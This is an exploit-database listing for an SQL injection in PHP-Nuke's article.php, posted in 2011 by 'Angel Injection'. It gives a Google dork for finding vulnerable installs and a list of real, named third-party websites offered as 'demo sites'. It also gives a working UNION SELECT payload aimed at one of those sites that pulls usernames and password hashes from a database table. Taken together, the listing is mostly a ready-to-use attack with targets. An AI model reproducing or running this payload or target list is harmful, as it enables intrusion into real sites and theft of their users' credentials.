[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Nuke (article.php) Sql Injection Vulnerability

Author
Angel Injection
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16550
Category
web applications
Date add
21-07-2011
Platform
php
# Exploit Title:PHP-Nuke(article.php) Sql Injection Vulnerability
# Date: 21/7/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail[Dot]com
# Vendor or Software Link:http://phpnuke.org/
# Version: N/A
# Category:: webapps
# Google dork: "Web site powered by PHP-Nuke" inurl:article.php?sid=
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Demo Sites
http://www.moravanszky.com/article.php?sid=23%27
http://scafi.uw.hu/article.php?sid=23%27
http://www.termicamica.com/pn/html/article.php?sid=23%27
http://www.marinellavitulli.it/article.php?sid=23%27
http://www.aidm.eu/article.php?sid=24%27
http://www.marinellavitulli.it/article.php?sid=23%27
http://oecc.nexenservices.com/News/article.php?sid=23%27
http://www.talkingcock.com/html/article.php?sid=23%27

How Exploit

Http://target/[patch]/article.php?sid=23'

Demo Exploit
http://www.moravanszky.com/article.php?sid=24+union+select+1,2,3,4,5,concat(name,0x3a,passwd),7,8,9+from+nuke_bannerclient



Enjoy ^_~
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team



#  0day.today [2024-12-23]  #